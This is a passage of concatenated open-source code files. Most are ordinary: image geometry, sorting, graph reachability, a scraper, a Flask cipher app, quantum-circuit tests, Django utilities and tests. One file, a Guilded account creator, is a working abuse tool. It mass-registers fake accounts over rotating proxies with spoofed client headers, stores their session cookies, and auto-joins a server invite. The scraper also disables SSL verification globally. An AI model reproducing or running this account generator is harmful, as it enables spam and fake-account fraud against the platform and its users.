sin_a * cos_a * long or abs(sin_a - cos_a) < 1e-10:\n s = 0.5 * short\n wr, hr = (s / cos_a, s / sin_a) if is_portrait else (s / sin_a, s / cos_a)\n else:\n cos_2a = cos_a**2 - sin_a**2\n wr = (original.width() * cos_a - original.height() * sin_a) / cos_2a\n hr = (original.height() * cos_a - original.width() * sin_a) / cos_2a\n\n x = (rotated.width() - wr) // 2\n y = (rotated.height() - hr) // 2\n\n return QRect(int(x), int(y), int(wr), int(hr))\n","repo_name":"karlch/vimiv-qt","sub_path":"vimiv/imutils/imtransform.py","file_name":"imtransform.py","file_ext":"py","file_size_in_byte":8688,"program_lang":"python","lang":"en","doc_type":"code","stars":162,"dataset":"github-code","pt":"77"} +{"seq_id":"26579472331","text":"List = [10, 58, 46, 5, 32, 20]\r\n\r\nn = len(List)\r\n\r\nprint('Your list before sorting:', List)\r\n\r\nfor k in range(1, n): # for loop will run 9 iteration as we start from 1\r\n for j in range(n - k): # n - k will be 9 on the first iteration\r\n if List[j] > List[j + 1]: # if the List index[j] is greater than the next\r\n temp = List[j] # store the value of index[j] in a var called temp\r\n List[j] = List[j + 1] # overwrite the index[j] with the one next to it\r\n List[j + 1] = temp # then overwrite index[j+1] with the value stored in temp\r\nprint('Your sorted list is', List)\r\n","repo_name":"AErenzo/Python_course_programs","sub_path":"bubbleSort.py","file_name":"bubbleSort.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6710053759","text":"i,u=int,input\nn=range(i(u()))\ng=[list(map(i, u().split()))for _ in n]\nfor m in n:\n for s in n:\n for t in n:g[s][t]=g[s][t]|(g[s][m]&g[m][t])\nfor l in g:print(*l)\n\n# n = range(int(input()))\n# graph = [list(map(int, input().split())) for _ in n]\n# for m in n:\n# for s in n:\n# for t in n:\n# graph[s][t] = graph[s][t] or (graph[s][m] and graph[m][t])\n# for l in graph:\n# print(*l)","repo_name":"hun-jae/189Python","sub_path":"week09/11403_경로찾기/김재헌.py","file_name":"김재헌.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71671764729","text":"from bs4 import BeautifulSoup\nimport urllib.request\nimport ssl\n\n\ndef open_link(link):\n ssl._create_default_https_context = ssl._create_unverified_context\n with urllib.request.urlopen(link) as url:\n return url.read()\n\n\nclass ImdbRate:\n\n @staticmethod\n def call(imdb_id):\n if imdb_id[:2] == 'tt':\n imdb_id = imdb_id[2:]\n\n return ImdbRate.get_rate(imdb_id)\n\n @staticmethod\n def get_rate(imdb_id):\n\n if imdb_id is None:\n return None, None, None\n\n try:\n imdb_link = \"https://www.imdb.com/title/tt\" + str(imdb_id)\n imdb_page = BeautifulSoup(open_link(imdb_link), \"html.parser\")\n\n aggregate_rating = imdb_page.select('div[itemprop=\"aggregateRating\"]')\n if len(aggregate_rating) == 0:\n return imdb_id, None, None\n\n rating_value = aggregate_rating[0].select('span[itemprop=\"ratingValue\"]')\n if len(rating_value) == 0:\n return imdb_id, None, None\n\n imbd_rate = rating_value[0].text\n imbd_rate = float(imbd_rate.replace(',', '.'))\n\n rating_count = aggregate_rating[0].select('span[itemprop=\"ratingCount\"]')\n if len(rating_count) == 0:\n return imdb_id, imbd_rate, None\n\n imbd_rates_count = rating_count[0].text\n imbd_rates_count = imbd_rates_count.replace(' ', '')\n imbd_rates_count = int(imbd_rates_count.replace(',', ''))\n\n return imdb_id, imbd_rate, imbd_rates_count\n\n except urllib.error.HTTPError:\n return imdb_id, None, None\n","repo_name":"kedrisse/cinerank_api","sub_path":"app/services/rates/imdb_rate.py","file_name":"imdb_rate.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"35665633279","text":"import os\nimport random\nimport requests\nimport binascii\nimport threading\n\nfrom colorama import Fore\n\ninvite = \"ENZ4d0jE\"\ncreated = 0\n\ndef get_rstr(lenght: int) -> str:\n return str(binascii.b2a_hex(os.urandom(lenght)).decode('utf-8'))\n\n\ndef Gen():\n try:\n global created\n proxy = random.choice(open('proxies.txt', 'r').read().splitlines())\n proxies = {'http': f'http://{proxy}', 'https': f'http://{proxy}'}\n\n name = ''.join(random.choices('poiuytrewqlkjhgfdsamnbvcxz098765431', k=7))\n email = ''.join(random.choices('poiuytrewqlkjhgfdsamnbvcxz098765431', k=8)) + '@gmail.com'\n password = ''.join(random.choices('poiuytrewqlkjhgfdsamnbvcxz098765431', k=12))\n headers = {\n 'authority' : 'www.guilded.gg',\n 'accept' : 'application/json, text/javascript, */*; q=0.01',\n 'accept-language' : 'en-GB,en;q=0.9',\n 'content-type' : 'application/json',\n 'guilded-client-id' : f'{get_rstr(8)}-{get_rstr(4)}-{get_rstr(4)}-{get_rstr(4)}-{get_rstr(12)}',\n 'guilded-stag' : get_rstr(32),\n 'guilded-viewer-platform': 'desktop',\n 'origin' : 'https://www.guilded.gg',\n 'referer' : 'https://www.guilded.gg/',\n 'sec-ch-ua' : '\"Google Chrome\";v=\"107\", \"Chromium\";v=\"107\", \"Not=A?Brand\";v=\"24\"',\n 'sec-ch-ua-mobile' : '?0',\n 'sec-ch-ua-platform' : '\"Windows\"',\n 'sec-fetch-dest' : 'empty',\n 'sec-fetch-mode' : 'cors',\n 'sec-fetch-site' : 'same-origin',\n 'user-agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36',\n 'x-requested-with' : 'XMLHttpRequest',\n }\n\n json = {\n 'extraInfo': {\n 'registrationSource': 'search',\n 'platform': 'desktop',\n },\n 'name' : name,\n 'email' : email,\n 'password': password,\n 'fullName': name,\n }\n\n response = requests.post('https://www.guilded.gg/api/users?type=email', json=json, headers=headers, proxies=proxies)\n if response.status_code == 200:\n created += 1\n print(f\"{Fore.BLUE}[ {Fore.GREEN}+ {Fore.BLUE}]{Fore.RESET} Generated ({created})\")\n hmac = response.cookies['hmac_signed_session']\n with open('cookies.txt', 'a') as cookieOpen:\n cookieOpen.write(f'{hmac}\\n')\n with open('accounts.txt', 'a') as accountOpen:\n accountOpen.write(f'{email}:{name}:{password}\\n')\n\n __headers__ = {\n 'authority': 'www.guilded.gg',\n 'accept': 'application/json, text/javascript, */*; q=0.01',\n 'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8',\n 'content-type': 'application/json',\n 'cookie': f'hmac_signed_session={hmac}',\n 'guilded-client-id': f'{get_rstr(8)}-{get_rstr(4)}-{get_rstr(4)}-{get_rstr(4)}-{get_rstr(12)}',\n 'guilded-viewer-platform': 'desktop',\n 'origin': 'https://www.guilded.gg',\n 'referer': 'https://www.guilded.gg/',\n 'sec-ch-ua': '\"Google Chrome\";v=\"107\", \"Chromium\";v=\"107\", \"Not=A?Brand\";v=\"24\"',\n 'sec-ch-ua-mobile': '?0',\n 'sec-ch-ua-platform': '\"Windows\"',\n 'sec-fetch-dest': 'empty',\n 'sec-fetch-mode': 'cors',\n 'sec-fetch-site': 'same-origin',\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36',\n 'x-requested-with': 'XMLHttpRequest',\n }\n\n params_ = {'teamId': f'{invite}','includeLandingChannel': 'true',}\n\n __json = {'type': 'consume',}\n response = requests.put(f'https://www.guilded.gg/api/invites/{invite}', params=params_, headers=__headers__, json=__json, proxies=proxies)\n\n else:\n print(f\"{Fore.BLUE}[ {Fore.RED}x {Fore.BLUE}]{Fore.RESET} Error\")\n except Exception as e:\n pass\n\n\nos.system('cls')\nthread = int(input(\"threads: \"))\nif __name__ == '__main__':\n for i in range(thread):\n threading.Thread(target=Gen).start()\n","repo_name":"Hazza3100/Guilded-Account-Creator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4562,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"77"} +{"seq_id":"29020367636","text":"import sqlite3\nimport sys\n\n\ndef create_table(database_name: str, table_name: str):\n try:\n sqlite_connection = sqlite3.connect(database_name)\n cursor = sqlite_connection.cursor()\n print(\"connect success\")\n cursor.execute(f'''CREATE TABLE IF NOT EXISTS {table_name}\n (EMPID INT, PASSPORT TEXT, FIRSTNAME TEXT, LASTNAME TEXT, \n GENDER INT, BIRTHDAY TEXT, NATIONALITY TEXT, HIRED TEXT,\n DEPT TEXT, POSITION TEXT, STATUS INT, REGION TEXT)''')\n sqlite_connection.commit()\n cursor.close()\n\n except sqlite3.Error as error:\n print(\"create table failed\", error)\n\n finally:\n if sqlite_connection:\n sqlite_connection.close()\n print(\"database.close\")\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 3:\n create_table(database_name=sys.argv[1], table_name=sys.argv[2])\n else:\n print(\"Please insert param\")\n\n","repo_name":"ummdev/-backwizard-dev-mountain","sub_path":"src/create_table.py","file_name":"create_table.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19321580643","text":"def sum_digits(n) :\r\n s = 0\r\n while n > 0 :\r\n t = n % 10\r\n s += t\r\n n = int(n / 10)\r\n return s\r\nn = input(\"Enter the credit card number : \")\r\nsumn = 0\r\nfor i in range(len(n) - 2, -1, -2) :\r\n t = int(n[i]) * 2\r\n if t >= 10 :\r\n t = sum_digits(t)\r\n sumn += t\r\nfor i in range(len(n) - 1, -1, -2) :\r\n sumn += int(n[i])\r\nif sumn % 10 == 0 :\r\n print(\"\\nVALID\")\r\nelse :\r\n print(\"\\nINVALID\")","repo_name":"VimaleshCT/ATMcard","sub_path":"atmcard.py","file_name":"atmcard.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13112390945","text":"import math\nfrom flask import Flask, render_template, request\napp=Flask(__name__)\n\n@app.route('/enc',methods=['GET','POST'])\ndef enc():\n\tif request.method=='POST':\n\t\tptext=request.form['ptext']\n\t\tpkey=request.form['pkey']\n\t\tdef encryptMessage(ptext): \n\t\t cipher = \"\" \n\t\t \n\t\t # track key indices \n\t\t k_indx = 0\n\t\t \n\t\t msg_len = float(len(ptext)) \n\t\t msg_lst = list(ptext) \n\t\t key_lst = sorted(list(pkey)) \n\t\t \n\t\t # calculate column of the matrix \n\t\t col = len(pkey) \n\t\t \n\t\t # calculate maximum row of the matrix \n\t\t row = int(math.ceil(msg_len / col)) \n\t\t \n\t\t # add the padding character '_' in empty \n\t\t # the empty cell of the matix \n\t\t fill_null = int((row * col) - msg_len) \n\t\t msg_lst.extend('_' * fill_null) \n\t\t \n\t\t # create Matrix and insert message and \n\t\t # padding characters row-wise \n\t\t matrix = [msg_lst[i: i + col] \n\t\t for i in range(0, len(msg_lst), col)] \n\t\t \n\t\t # read matrix column-wise using key \n\t\t for _ in range(col): \n\t\t curr_idx = pkey.index(key_lst[k_indx]) \n\t\t cipher += ''.join([row[curr_idx] \n\t\t for row in matrix]) \n\t\t k_indx += 1\n\t\t \n\t\t return cipher\n\t\tcipher=encryptMessage(ptext)\n\t\t\n\t\treturn render_template('cip.html', cipher=cipher)\n\n\treturn render_template('enc.html')\n@app.route('/dec',methods=['GET','POST'])\ndef dec():\n\tif request.method=='POST':\n\t\tctext=request.form['ctext']\n\t\tckey=request.form['ckey']\n\t\tdef decryptMessage(ctext): \n\t\t msg = \"\" \n\t\t \n\t\t # track key indices \n\t\t k_indx = 0\n\t\t \n\t\t # track msg indices \n\t\t msg_indx = 0\n\t\t msg_len = float(len(ctext)) \n\t\t msg_lst = list(ctext) \n\t\t \n\t\t # calculate column of the matrix \n\t\t col = len(ckey) \n\t\t \n\t\t # calculate maximum row of the matrix \n\t\t row = int(math.ceil(msg_len / col)) \n\t\t \n\t\t # convert key into list and sort \n\t\t # alphabetically so we can access \n\t\t # each character by its alphabetical position. \n\t\t key_lst = sorted(list(ckey)) \n\t\t \n\t\t # create an empty matrix to \n\t\t # store deciphered message \n\t\t dec_cipher = [] \n\t\t for _ in range(row): \n\t\t dec_cipher += [[None] * col] \n\t\t \n\t\t # Arrange the matrix column wise according \n\t\t # to permutation order by adding into new matrix \n\t\t for _ in range(col): \n\t\t curr_idx = ckey.index(key_lst[k_indx]) \n\t\t \n\t\t for j in range(row): \n\t\t dec_cipher[j][curr_idx] = msg_lst[msg_indx] \n\t\t msg_indx += 1\n\t\t k_indx += 1\n\t\t \n\t\t # convert decrypted msg matrix into a string \n\t\t try: \n\t\t msg = ''.join(sum(dec_cipher, [])) \n\t\t except TypeError: \n\t\t raise TypeError(\"This program cannot\", \n\t\t \"handle repeating words.\") \n\t\t \n\t\t null_count = msg.count('_') \n\t\t \n\t\t if null_count > 0: \n\t\t return msg[: -null_count] \n\t\t \n\t\t return msg \n\t\tplain=decryptMessage(ctext)\n\t\treturn render_template('pl.html', plain=plain)\n\t\n\treturn render_template('dec.html')\n\nif __name__==\"__main__\":\n\tapp.run()\n","repo_name":"ganesh140/cnsassignment","sub_path":"cns/trcip.py","file_name":"trcip.py","file_ext":"py","file_size_in_byte":3062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22177604756","text":"from typing import Optional, Sequence, Union, Collection, Tuple, List\n\nimport pytest\n\nimport numpy as np\n\nimport cirq\nfrom cirq.ops import control_values as cv\n\n\nclass GoodGate(cirq.EigenGate, cirq.testing.SingleQubitGate):\n def _eigen_components(self) -> List[Tuple[float, np.ndarray]]: # pragma: no cover\n return [(0, np.diag([1, 0])), (1, np.diag([0, 1]))]\n\n\nclass BadGateOperation(cirq.GateOperation):\n def controlled_by(\n self,\n *control_qubits: 'cirq.Qid',\n control_values: Optional[\n Union[cv.AbstractControlValues, Sequence[Union[int, Collection[int]]]]\n ] = None,\n ) -> 'cirq.Operation':\n return cirq.ControlledOperation(control_qubits, self, control_values)\n\n\nclass BadGate(cirq.EigenGate, cirq.testing.SingleQubitGate):\n def _eigen_components(self) -> List[Tuple[float, np.ndarray]]:\n return [(0, np.diag([1, 0])), (1, np.diag([0, 1]))]\n\n def on(self, *qubits: 'cirq.Qid') -> 'cirq.Operation':\n return BadGateOperation(self, list(qubits))\n\n def controlled(\n self,\n num_controls: Optional[int] = None,\n control_values: Optional[\n Union[cv.AbstractControlValues, Sequence[Union[int, Collection[int]]]]\n ] = None,\n control_qid_shape: Optional[Tuple[int, ...]] = None,\n ) -> 'cirq.Gate':\n ret = super().controlled(num_controls, control_values, control_qid_shape)\n if num_controls == 1 and control_values is None:\n return cirq.CZPowGate(exponent=self._exponent, global_shift=self._global_shift)\n return ret\n\n\ndef test_assert_controlled_and_controlled_by_identical():\n cirq.testing.assert_controlled_and_controlled_by_identical(GoodGate())\n\n with pytest.raises(AssertionError):\n cirq.testing.assert_controlled_and_controlled_by_identical(BadGate())\n\n with pytest.raises(ValueError, match=r'len\\(num_controls\\) != len\\(control_values\\)'):\n cirq.testing.assert_controlled_and_controlled_by_identical(\n GoodGate(), num_controls=[1, 2], control_values=[(1,)]\n )\n\n with pytest.raises(ValueError, match=r'len\\(control_values\\[1\\]\\) != num_controls\\[1\\]'):\n cirq.testing.assert_controlled_and_controlled_by_identical(\n GoodGate(), num_controls=[1, 2], control_values=[(1,), (1, 1, 1)]\n )\n\n\ndef test_assert_controlled_unitary_consistent():\n cirq.testing.assert_controlled_and_controlled_by_identical(\n GoodGate(exponent=0.5, global_shift=1 / 3)\n )\n\n with pytest.raises(AssertionError):\n cirq.testing.assert_controlled_and_controlled_by_identical(\n BadGate(exponent=0.5, global_shift=1 / 3)\n )\n","repo_name":"quantumlib/Cirq","sub_path":"cirq-core/cirq/testing/consistent_controlled_gate_op_test.py","file_name":"consistent_controlled_gate_op_test.py","file_ext":"py","file_size_in_byte":2667,"program_lang":"python","lang":"en","doc_type":"code","stars":3974,"dataset":"github-code","pt":"77"} +{"seq_id":"32563735104","text":"\"\"\"\nDjango Rest Framework utility classes\n=====================================\n\nAnything in this package is used along with the Django Rest Framework\nto provide for our use cases within our application.\n\"\"\"\nfrom datetime import datetime\n\nimport uuid\nimport warnings\nfrom calendar import timegm\nfrom django.conf import settings\nfrom django.utils.translation import get_language_from_request\nfrom djangorestframework_camel_case.render import CamelCaseJSONRenderer\nfrom rest_framework import pagination, permissions\nfrom rest_framework.permissions import BasePermission\nfrom rest_framework.response import Response\nfrom rest_framework.utils.urls import replace_query_param\nfrom rest_framework_jwt.compat import get_username_field, get_username\nfrom rest_framework_jwt.settings import api_settings\n\nfrom utils.mime import FULL_FORMAT, SUMMARY_FORMAT\nfrom .http import LinkHeaderField, LinkHeaderRel\n\n\nclass LinkHeaderPagination(pagination.PageNumberPagination):\n \"\"\" Replaces the default pagination classes, provided by DRF, with one\n that returns pagination data as part of the HTTP Link header.\n\n The RFC can be found `here`_\n\n In addition, a second, custom HTTP header is included: X-Total-Results,\n which will be a numeric count of the total number of objects across all\n pages.\n \"\"\"\n page_size_query_param = 'per_page'\n max_page_size = 250\n\n def get_first_url(self):\n if not self.page.has_previous():\n return None\n url = self.request.build_absolute_uri()\n return replace_query_param(url, self.page_query_param, 1)\n\n def get_last_url(self):\n if not self.page.has_next():\n return None\n url = self.request.build_absolute_uri()\n return replace_query_param(\n url, self.page_query_param, self.page.paginator.num_pages)\n\n def get_paginated_response(self, data):\n\n next_url = self.get_next_link()\n previous_url = self.get_previous_link()\n\n link_parts = []\n\n # if we have a next page, then we know we have a last, as well.\n if next_url is not None:\n link_parts.extend([\n LinkHeaderField(\n url=next_url,\n rel=LinkHeaderRel.next,\n title=str(self.page.number + 1)),\n LinkHeaderField(\n url=self.get_last_url(),\n rel=LinkHeaderRel.last,\n title=self.page.paginator.num_pages),\n ])\n\n # if we have a previous page, then we know we have a first page, too.\n if previous_url is not None:\n link_parts.extend([\n LinkHeaderField(\n url=previous_url,\n rel=LinkHeaderRel.prev,\n title=str(self.page.number - 1)),\n LinkHeaderField(\n url=self.get_first_url(),\n rel=LinkHeaderRel.first,\n title=str(1)),\n ])\n\n headers = {\n 'Link': \", \".join(\n [str(link) for link in link_parts]) if link_parts else {},\n 'X-Total-Results': self.page.paginator.count,\n }\n return Response(data, headers=headers)\n\n\ndef convert_env_boolean(env_value: str) -> bool:\n \"\"\" Converts an envvar string into a boolean. Rules: true/True/TRUE/t/T/1 -> True; All others false\n\n >>> convert_env_boolean('t')\n True\n\n >>> convert_env_boolean('1')\n True\n\n >>> convert_env_boolean('0')\n False\n \"\"\"\n return env_value.lower() in ['true', '1', 't']\n\n\nclass SoftDeletableListViewMixin:\n \"\"\" Same as a 'ListViewMixin', but instead, by default, filters out\n models which have an 'is_active' attribute set to false.\n\n If the 'include_inactive=true', parameter is passed in the query string,\n then all models (regardless of 'is_active' attribute), will be returned.\n \"\"\"\n def get_queryset(self):\n if convert_env_boolean(self.request.query_params.get('include_inactive', '')):\n return self.queryset\n else:\n return self.queryset.filter(is_active=True)\n\n\nclass IsAuthenticatedOrOptions(BasePermission):\n \"\"\" Allows access only to authenticated users, unless the request is\n for the http OPTIONS method, then the user is directly allowed.\n \"\"\"\n def has_permission(self, request, view):\n if request.method == 'OPTIONS':\n return True\n else:\n return request.user and request.user.is_authenticated()\n\n\nclass IsOwner(BasePermission):\n def has_permission(self, request, view):\n if view.queryset.get().user == request.user:\n return True\n\n\nclass SummarizedListMixin:\n def get_serializer_class(self):\n if self.request.method == 'GET':\n if hasattr(self, 'summary_serializer_class'):\n return self.summary_serializer_class\n else:\n return create_summary_serializer(self.serializer_class)\n else:\n return self.serializer_class\n\n\ndef create_summary_serializer(serializer_cls):\n \"\"\" Creates a 'summary serializer' for a given standard serializer class.\n\n This is intended for list endpoints, and shortens the serializer class to only send back a 'title' and an 'href'\n\n :param serializer_cls:\n :return:\n \"\"\"\n class SummarySerializer(serializer_cls):\n class Meta(serializer_cls.Meta):\n fields = getattr(\n serializer_cls.Meta,\n 'summary_fields',\n ('href', 'name')\n )\n return SummarySerializer\n\n\nclass SummaryCamelCaseRenderer(CamelCaseJSONRenderer):\n \"\"\" Just like the CamelCaseJSONRenderer, but replaces any MultiLang fields (or things that\n LOOK like multilang fields) and replaces them with a string representing the user's current language.\n\n .. code-block:: python\n\n renderer.render({\n \"name\": \"Derek\",\n \"bio\": {\n \"en\": \"From Pittsburgh\",\n \"id\": \"Dari Pittsburgh\"\n }\n })\n\n # this will then return if the request language was set to english\n {\n \"name\": \"Derek\",\n \"bio\": \"From Pittsburgh\"\n }\n\n \"\"\"\n media_type = SUMMARY_FORMAT\n format = 'json'\n\n def render(self, data, accepted_media_type=None, renderer_context=None):\n # TODO: this is ugly as sin.. needs refactored heavily.\n if isinstance(data, list):\n for element in data:\n enabled_languages = sorted([t[0] for t in settings.LANGUAGES])\n for k, v in element.items():\n if isinstance(v, dict) and enabled_languages == sorted(v.keys()):\n preferred_language = settings.LANGUAGE_CODE\n try:\n preferred_language = get_language_from_request(renderer_context['request'])\n except Exception:\n pass\n element[k] = v[preferred_language[:2]] # make if something like en-US, just get 'en'\n elif isinstance(data, dict):\n enabled_languages = sorted([t[0] for t in settings.LANGUAGES])\n for k, v in data.items():\n if isinstance(v, dict) and enabled_languages == sorted(v.keys()):\n preferred_language = settings.LANGUAGE_CODE\n try:\n preferred_language = get_language_from_request(renderer_context['request'])\n except Exception:\n pass\n data[k] = v[preferred_language[:2]] # make if something like en-US, just get 'en'\n return super(SummaryCamelCaseRenderer, self).render(\n data,\n accepted_media_type=accepted_media_type,\n renderer_context=renderer_context\n )\n\n\nclass FullCamelCaseRenderer(CamelCaseJSONRenderer):\n media_type = FULL_FORMAT\n format = 'json+full'\n\n\ndef custom_jwt_payload_hander(user):\n username_field = get_username_field()\n username = get_username(user)\n\n warnings.warn(\n 'The following fields will be removed in the future: '\n '`email` and `user_id`. ',\n DeprecationWarning\n )\n\n payload = {\n 'user_id': user.pk,\n 'email': user.email,\n 'username': username,\n 'exp': datetime.utcnow() + api_settings.JWT_EXPIRATION_DELTA\n }\n if isinstance(user.pk, uuid.UUID):\n payload['user_id'] = str(user.pk)\n\n payload[username_field] = username\n\n # Include original issued at time for a brand new token,\n # to allow token refresh\n if api_settings.JWT_ALLOW_REFRESH:\n payload['orig_iat'] = timegm(\n datetime.utcnow().utctimetuple()\n )\n\n if api_settings.JWT_AUDIENCE is not None:\n payload['aud'] = api_settings.JWT_AUDIENCE\n\n if api_settings.JWT_ISSUER is not None:\n payload['iss'] = api_settings.JWT_ISSUER\n\n payload['first_name'] = user.first_name if user.first_name else ''\n payload['last_name'] = user.last_name if user.last_name else ''\n\n return payload\n","repo_name":"rezapyon/sms-backend","sub_path":"utils/drf.py","file_name":"drf.py","file_ext":"py","file_size_in_byte":9151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"} +{"seq_id":"24690530235","text":"from dataclasses import dataclass, field\nimport environ\nimport pathlib\n\n\n# выделяем настройки в отдельный объект, для снижения связанности кода\n# так удобнее писать автотесты\n\n\n@dataclass\nclass Settings:\n # Объект окружения, из которого мы достаём параметры.\n env: environ.Env = field(default_factory=environ.Env)\n # Путь до .env файла.\n env_path: pathlib.Path = field(default=None)\n # Путь до корня проекта.\n BASE_DIR: pathlib.Path = field(init=False)\n\n # Настройки проекта\n # URL до redis экстрактора.\n EXTRACTOR_TO_TRANSFORMER_QUERY_HOST: str = field(init=False)\n # URL до redis трансформера.\n TRANSFORMER_TO_LOADER_QUERY_HOST: str = field(init=False)\n\n def __post_init__(self):\n self.BASE_DIR = pathlib.Path(__file__).resolve().parent.parent\n self.env_path = self.BASE_DIR / \".env\" if not self.env_path else self.env_path\n environ.Env.read_env(self.env_path.as_posix())\n self.EXTRACTOR_TO_TRANSFORMER_QUERY_HOST: str = self.env.str(\n \"EXTRACTOR_TO_TRANSFORMER_QUERY_HOST\"\n )\n self.TRANSFORMER_TO_LOADER_QUERY_HOST: str = self.env.str(\n \"TRANSFORMER_TO_LOADER_QUERY_HOST\"\n )\n\n\nsettings = Settings()\n","repo_name":"PORT-21/ETL_template","sub_path":"app/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"44059767632","text":"import pytest\nfrom datetime import date\nfrom django.urls import reverse\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom app.models.mensalidade import Mensalidade\nfrom app.models.competencia import Competencia\nfrom app.models.associado import Associado\nfrom app.models.alinea import Alinea\nfrom app.models.contratacao import Contratacao\nfrom app.models.contrato import Contrato\n\n\ndef create_mensalidade():\n contrato = Contrato.objects.create(nome=\"Contrato Nome\")\n competencia = Competencia.objects.create(ano='2020', mes='01', data=date.today())\n associado = Associado.objects.create(nome=\"Associado Nome\")\n mensalidade = Mensalidade.objects.create(\n competencia=competencia, associado=associado, data_vence=date.today())\n contratacao = Contratacao.objects.create(\n contrato=contrato, associado=associado, descricao='Descrição', valor=1.00, ativa=True)\n Alinea.objects.create(mensalidade=mensalidade, contratacao=contratacao, valor=15)\n return [mensalidade, associado]\n\n\n\n@pytest.mark.django_db\ndef test_mensalidade_show(auto_login_user):\n mensalidade, _ = create_mensalidade()\n client, _user = auto_login_user()\n response = client.get(reverse('mensalidade_show', kwargs={'mensalidade_id':mensalidade.id}))\n assert response.status_code == 200\n for string in [b'Associado Nome', b'Contrato Nome', bytes('Descrição', 'utf-8')]:\n assert string in response.content\n\n\n@pytest.mark.django_db\ndef test_mensalidade_edit_user(auto_login_user):\n client, _user = auto_login_user()\n mensalidade, _ = create_mensalidade()\n response = client.get(reverse('mensalidade_edit', kwargs={'mensalidade_id':mensalidade.id}))\n assert response.status_code == 302\n\n\n@pytest.mark.django_db\ndef test_mensalidade_edit(admin_client):\n mensalidade, _ = create_mensalidade()\n response = admin_client.get(reverse('mensalidade_edit', kwargs={'mensalidade_id':mensalidade.id}))\n assert response.status_code == 200\n response = admin_client.post(\n reverse('mensalidade_edit', kwargs={'mensalidade_id':mensalidade.id}),\n data=dict(data_vence=f\"{date.today()}\"), follow=True)\n assert response.status_code == 200\n assert b'Registro salvo com sucesso' in response.content\n\n\n@pytest.mark.django_db\ndef test_mensalidade_pay(auto_login_user):\n client, _user = auto_login_user()\n mensalidade, associado = create_mensalidade()\n response = client.get(reverse('associado_show', kwargs={'associado_id':associado.id}))\n assert response.status_code == 200\n assert b'Receber' in response.content\n response = client.get(reverse('mensalidade_pay', kwargs={'mensalidade_id':mensalidade.id}))\n assert response.status_code == 200\n response = client.post(\n reverse('mensalidade_pay', kwargs={'mensalidade_id':mensalidade.id}),\n data=dict(data_pgto=f\"{date.today()}\", valor_pgto=15), follow=True)\n assert response.status_code == 200\n assert b'Registro salvo com sucesso' in response.content\n assert b'Receber' not in response.content\n\n\n@pytest.mark.django_db\ndef test_mensalidade_print(auto_login_user):\n mensalidade, _ = create_mensalidade()\n client, _user = auto_login_user()\n response = client.get(reverse('mensalidade_print', kwargs={'mensalidade_id':mensalidade.id}))\n assert response.status_code == 200\n for string in [b'Associado Nome', b'Contrato Nome', bytes('Descrição', 'utf-8')]:\n assert string in response.content\n\n\n@pytest.mark.django_db\ndef test_mensalidade_print_associado(auto_login_user):\n mensalidade, _ = create_mensalidade()\n client, _user = auto_login_user()\n response = client.get(reverse('mensalidade_print_associado', kwargs={'associado_id':mensalidade.associado.id}))\n assert response.status_code == 200\n for string in [b'Associado Nome', b'Contrato Nome', bytes('Descrição', 'utf-8')]:\n assert string in response.content\n\n\n@pytest.mark.django_db\ndef test_mensalidade_print_competencia(auto_login_user):\n mensalidade, _ = create_mensalidade()\n client, _user = auto_login_user()\n response = client.get(reverse('mensalidade_print_competencia', kwargs={'competencia_id':mensalidade.competencia.id}))\n assert response.status_code == 200\n for string in [b'Associado Nome', b'Contrato Nome', bytes('Descrição', 'utf-8')]:\n assert string in response.content\n","repo_name":"Kdio/django","sub_path":"tests/views/mensalidade_views_test.py","file_name":"mensalidade_views_test.py","file_ext":"py","file_size_in_byte":4354,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"32355827692","text":"from Crypto.Hash import SHA256 as sha\nfrom math import ceil\nimport pprint as pp\n\ndef compByte(b1, b2):\n # Comparing the size of the length of binary bits will already determine the 8-L amount of bits.\n xor = b1 ^ b2\n # print('comparing: ', b1, b2)\n # print('binary form: {}({}) {}({})'.format(bin(b1), len(bin(b1))-2, bin(b2), len(bin(b2))-2))\n # print('XOR output: ', bin(xor))\n\n # bin(byte) will produce the string output of a bits in the notation '0b00110011' \n # so the first 2 chars unused. If 2 bytes share a smaller length, then the \n # first bits collide with the fact that they're both 0.\n b1N = len(bin(b1)) - 2\n b2N = len(bin(b2)) - 2\n \n # Bits matching (leading zeros if both aren't using all 8 bits)\n bits = 8 - b1N if b1N > b2N else 8 - b2N\n\n if b1N == b2N:\n # Xor starts where bits differ, so look at the length of the xor.\n if xor == 0: \n bits = 8\n else:\n bits = 8 - int(len(bin(xor))-2)\n\n # print('leading bits similar: {}'.format(bits))\n\n return bits\n\n# Will compare last hash with all those before\ndef compHash(hash1, hash2):\n bits = 0\n for i, char1 in enumerate(hash1):\n bits += compByte(char1, hash2[i])\n if (bits % 8 != 0) | (bits == 0):\n # print(\"bits collided: {}\".format(bits))\n break\n else:\n if i == 3:\n print('we found a duplicate value?')\n else:\n print(\"STILL GOING!\")\n\n return bits\n\n \ndef debugCompByte():\n H = sha.new()\n 